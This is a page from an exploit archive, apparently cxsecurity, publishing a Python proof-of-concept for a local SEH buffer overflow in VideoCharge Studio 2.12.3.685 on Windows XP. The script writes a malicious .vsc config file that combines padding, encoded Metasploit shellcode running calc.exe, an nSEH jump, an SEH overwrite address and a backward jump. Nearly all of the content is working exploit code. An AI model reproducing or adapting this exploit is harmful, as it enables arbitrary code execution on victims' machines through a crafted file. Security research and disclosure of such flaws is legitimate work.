VideoCharge Studio SEH Buffer Overflow

2013.10.28
Credit: metacom
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

#!/usr/bin/python # Exploit Title: VideoCharge Studio SEH Buffer Overflow # Date found: 27.10.2013 # Exploit Author: metacom # URL: http://www.videocharge.com/download.php # Software Link: www.videocharge.com/download/VideoChargeStudio_Install.exe # Version: 2.12.3.685 # Tested on: Windows XP SP2 # Poc demo:http://bit.ly/1axkW74 import struct head=("\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22" "\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x57\x69\x6E\x64\x6F\x77\x73\x2D\x31\x32" "\x35\x32\x22\x20\x3F\x3E\x3C\x63\x6F\x6E\x66\x69\x67\x20\x76\x65\x72\x3D\x22\x32\x2E" "\x31\x32\x2E\x33\x2E\x36\x38\x35\x22\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D" "\x65\x3D\x22\x46\x69\x6C\x65\x73\x22\x2F\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61" "\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x73\x22\x3E\x0A\x0A\x3C\x50\x72\x6F\x70" "\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x50\x72\x6F\x66\x69\x6C\x65\x22\x3E\x0A" "\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x46\x6F\x72\x6D\x61\x74\x73\x22" "\x3E\x0A\x0A\x3C\x50\x72\x6F\x70\x65\x72\x74\x79\x20\x6E\x61\x6D\x65\x3D\x22\x53\x74" "\x72\x65\x61\x6D\x22\x3E\x0A\x0A\x3C\x56\x61\x6C\x75\x65\x20\x6E\x61\x6D\x65\x3D\x22" "\x4E\x61\x6D\x65\x22\x20\x74\x79\x70\x65\x3D\x22\x38\x22\x20\x76\x61\x6C\x75\x65\x3D\x22") #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/shikata_ga_nai #-b '\x00\x0a\x0d\x3c\x22\x26' -t c shellcode = ("\xbb\x80\xa3\x02\xb2\xda\xcc\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" "\x33\x31\x5e\x12\x03\x5e\x12\x83\x6e\x5f\xe0\x47\x92\x48\x6c" "\xa7\x6a\x89\x0f\x21\x8f\xb8\x1d\x55\xc4\xe9\x91\x1d\x88\x01" "\x59\x73\x38\x91\x2f\x5c\x4f\x12\x85\xba\x7e\xa3\x2b\x03\x2c" "\x67\x2d\xff\x2e\xb4\x8d\x3e\xe1\xc9\xcc\x07\x1f\x21\x9c\xd0" "\x54\x90\x31\x54\x28\x29\x33\xba\x27\x11\x4b\xbf\xf7\xe6\xe1" "\xbe\x27\x56\x7d\x88\xdf\xdc\xd9\x29\xde\x31\x3a\x15\xa9\x3e" "\x89\xed\x28\x97\xc3\x0e\x1b\xd7\x88\x30\x94\xda\xd1\x75\x12" "\x05\xa4\x8d\x61\xb8\xbf\x55\x18\x66\x35\x48\xba\xed\xed\xa8" "\x3b\x21\x6b\x3a\x37\x8e\xff\x64\x5b\x11\xd3\x1e\x67\x9a\xd2" "\xf0\xee\xd8\xf0\xd4\xab\xbb\x99\x4d\x11\x6d\xa5\x8e\xfd\xd2" "\x03\xc4\xef\x07\x35\x87\x65\xd9\xb7\xbd\xc0\xd9\xc7\xbd\x62" "\xb2\xf6\x36\xed\xc5\x06\x9d\x4a\x39\x4d\xbc\xfa\xd2\x08\x54" "\xbf\xbe\xaa\x82\x83\xc6\x28\x27\x7b\x3d\x30\x42\x7e\x79\xf6" "\xbe\xf2\x12\x93\xc0\xa1\x13\xb6\xa2\x24\x80\x5a\x0b\xc3\x20" "\xf8\x53") junk = 824 buffer= "\x41" * (junk - len(shellcode)) shellcode= shellcode nseh= "\xEB\x06\x90\x90" seh= struct.pack("<L",0x61B811F1) jump="\xe9\x3f\xfd\xff\xff" end=("\x22\x2F\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F" "\x63\x6F\x6C\x73\x3E\x0A\x0A\x3C\x63\x6F\x6C\x73\x20\x6E\x61\x6D\x65\x3D\x22\x52\x6F" "\x6D\x61\x6E\x69\x61\x20\x53\x65\x63\x75\x72\x69\x74\x79\x20\x54\x65\x61\x6D\x22\x2F" "\x3E\x0A\x0A\x3C\x2F\x50\x72\x6F\x70\x65\x72\x74\x79\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6C" "\x73\x3E\x0A\x0A\x3C\x2F\x63\x6F\x6E\x66\x69\x67\x3E") off = head + buffer + shellcode + nseh + seh + jump + end try: out_file = open("POC.vsc",'w') out_file.write(off) out_file.close() print("[*] Malicious vsc file created successfully") except: print "[!] Error creating file"


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top